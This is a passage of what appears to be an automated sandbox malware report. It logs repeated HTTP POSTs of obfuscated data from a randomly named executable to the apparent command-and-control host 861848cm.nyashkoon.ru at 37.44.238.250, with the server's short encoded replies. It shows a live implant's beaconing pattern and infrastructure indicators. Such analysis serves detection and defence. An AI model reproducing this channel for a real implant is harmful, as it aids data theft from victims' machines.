                                                                                            Nov 5, 2024 23:52:41.743778944 CET | 1024 | OUT | Data Raw: 53 54 5a 55 56 58 50 5d 5a 5f 52 51 54 5d 5b 5f 55 50 59 56 51 56 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZUVXP]Z_RQT][_UPYVQVRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/Y>+8<_<0](*5_)]0(#4<-?3Z9,#&\'9'X$.Q-
                                                                                            Nov 5, 2024 23:52:42.205102921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:42.273930073 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            12 | 192.168.2.4 | 49753 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:42.517615080 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:42.867999077 CET | 1024 | OUT | Data Raw: 53 53 5a 5f 56 5e 55 5e 5a 5f 52 51 54 5d 5b 52 55 53 59 5e 51 55 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZ_V^U^Z_RQT][RUSY^QUR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\8<5+ ]<U8X(95_)=9$/ /1(-/-<X!$:^&)'X$.Q-
                                                                                            Nov 5, 2024 23:52:43.338536024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:43.409671068 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            13 | 192.168.2.4 | 49754 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:43.607105970 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:43.961815119 CET | 1024 | OUT | Data Raw: 53 53 5a 55 53 5a 55 5e 5a 5f 52 51 54 5d 5b 59 55 57 59 58 51 52 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZUSZU^Z_RQT][YUWYXQRR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_,/6(7>#0Y*\!Y=[)38<[ 1+>+Y-/47"X')'X$.Q-
                                                                                            Nov 5, 2024 23:52:44.419316053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:44.492446899 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            14 | 192.168.2.4 | 49755 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:44.620465994 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            15 | 192.168.2.4 | 49756 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:44.952656984 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:45.305617094 CET | 1264 | OUT | Data Raw: 56 56 5a 54 56 59 55 5d 5a 5f 52 51 54 5b 5b 5e 55 52 59 5c 51 53 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZTVYU]Z_RQT[[^URY\QSRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;5+;+>3$*=_)=>[08, 9( ./7=&)'X$.Q-"
                                                                                            Nov 5, 2024 23:52:45.772169113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:45.851747036 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 17 2b 2a 22 5b 24 2b 2f 08 3d 00 03 59 29 30 20 06 3b 32 02 58 3e 1d 20 5c 2a 06 3c 18 37 01 2b 1a 35 0c 21 10 21 22 2c 03 29 3b 21 5f 05 1d 3a 01 24 5f 20 12 29 31 39 05 3e 19 2b 19 27 20 0a 42 29 05 22 11 20 3a 3d 0e 32 07 2d 12 27 31 37 55 2b 0a 22 03 2d 11 2b 54 32 00 2a 57 09 16 20 57 27 30 3f 5e 29 31 20 00 27 3e 3a 06 26 29 27 1c 3d 3c 2f 5d 21 24 3a 59 29 1d 2f 13 22 24 31 05 26 3a 22 42 25 00 23 56 2b 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: +*"[$+/=Y)0 ;2X> \*<7+5!!",);!_:$_ )19>+' B)" :=2-'17U+"-+T2*W W'0?^)1 '>:&)'=</]!$:Y)/"$1&:"B%#V+&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            16 | 192.168.2.4 | 49757 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:45.075854063 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:45.430764914 CET | 1024 | OUT | Data Raw: 53 51 5a 5f 56 59 50 58 5a 5f 52 51 54 5d 5b 58 55 54 59 5b 51 50 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQZ_VYPXZ_RQT][XUTY[QPRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X/?<^$X?$\>*)[6^%;4_4!+-$#712)'X$.Q-
                                                                                            Nov 5, 2024 23:52:45.897156954 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:45.965421915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            17 | 192.168.2.4 | 49758 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:46.293800116 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:46.649306059 CET | 1024 | OUT | Data Raw: 56 52 5a 59 53 5c 55 58 5a 5f 52 51 54 52 5b 58 55 57 59 5e 51 56 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZYS\UXZ_RQTR[XUWY^QVR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8?2U<$_>#+)*!_>-38"?%?=?]9%#7_%'X$.Q-
                                                                                            Nov 5, 2024 23:52:47.105568886 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:47.175134897 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            18 | 192.168.2.4 | 49759 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:47.310585022 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:47.664904118 CET | 1024 | OUT | Data Raw: 53 56 5a 59 56 5f 50 5b 5a 5f 52 51 54 5f 5b 5c 55 54 59 56 51 54 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZYV_P[Z_RQT_[\UTYVQTR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&//!?(X>3'=5Y?>6_$8X#<.Q(>.5(_4':&)'X$.Q-2
                                                                                            Nov 5, 2024 23:52:48.131917953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:48.204116106 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            19 | 192.168.2.4 | 49760 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:48.355578899 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:48.712156057 CET | 1024 | OUT | Data Raw: 56 51 5a 5c 56 56 55 5f 5a 5f 52 51 54 5e 5b 5b 55 53 59 5c 51 56 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZ\VVU_Z_RQT^[[USY\QVR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y;<6+8^<(**"Z'<_ "P<= - 2X%'X$.Q-6
                                                                                            Nov 5, 2024 23:52:49.166454077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:49.235811949 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            20 | 192.168.2.4 | 49761 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:50.319996119 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:50.675709009 CET | 1024 | OUT | Data Raw: 56 5f 5a 58 56 5f 50 52 5a 5f 52 51 54 5e 5b 53 55 50 59 5b 51 52 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZXV_PRZ_RQT^[SUPY[QRR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8/)?(7<+*:")]'#Y:?X,-C0_4:]2)'X$.Q-6


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            21 | 192.168.2.4 | 49762 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:50.907403946 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:51.262037992 CET | 1264 | OUT | Data Raw: 56 5f 5f 5e 56 5e 55 5e 5a 5f 52 51 54 5c 5b 5f 55 5d 59 57 51 55 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V__^V^U^Z_RQT\[_U]YWQUR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8,>('(4(*=Y>$^ #?T+>?[:%^ .Y1'X$.Q->
                                                                                            Nov 5, 2024 23:52:51.719980001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:51.792475939 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5c 3c 14 26 11 30 5d 2b 0d 3e 3d 22 00 28 0e 0d 5a 2f 1c 38 5b 2a 55 38 11 3e 06 30 53 23 01 2b 59 35 54 35 5b 37 31 2c 00 3c 01 21 5f 05 1d 39 5b 30 39 2c 55 29 32 08 58 29 24 30 0a 25 1e 2b 19 2a 2b 08 5c 23 3a 26 56 26 2d 25 5b 32 0c 0d 18 3f 1a 04 07 39 06 2c 09 31 3a 2a 57 09 16 23 09 24 1d 02 00 2a 57 3c 06 24 2e 3a 06 32 39 23 1f 3e 3f 23 1f 34 1a 03 00 2b 33 05 5f 21 19 29 04 30 39 26 41 26 00 01 52 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: \<&0]+>="(Z/8[*U8>0S#+Y5T5[71,<!_9[09,U)2X)$0%+*+\#:&V&-%[2?9,1:*W#$*W<$.:29#>?#4+3_!)09&A&R+2&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            22 | 192.168.2.4 | 49763 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:51.599241018 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:51.946196079 CET | 1024 | OUT | Data Raw: 56 56 5f 5f 56 5f 55 59 5a 5f 52 51 54 53 5b 5f 55 50 59 56 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VV__V_UYZ_RQTS[_UPYVQUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/!+#+3[*\1_='^ Z#,1(X.5'#7=%'X$.Q-
                                                                                            Nov 5, 2024 23:52:52.425318003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:52.498301029 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            23 | 192.168.2.4 | 49764 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:52.632312059 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:52.977530003 CET | 1024 | OUT | Data Raw: 56 52 5a 5e 56 59 50 5c 5a 5f 52 51 54 5b 5b 53 55 52 59 5b 51 55 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZ^VYP\Z_RQT[[SURY[QUR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X/"V?('<(*!)^'^ #<"W(-3\,&8\#7]')'X$.Q-"
                                                                                            Nov 5, 2024 23:52:53.453485012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:53.529540062 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            24 | 192.168.2.4 | 49765 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:53.717717886 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:54.071305037 CET | 1024 | OUT | Data Raw: 53 52 5f 5b 56 56 50 58 5a 5f 52 51 54 52 5b 5b 55 51 59 56 51 5f 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
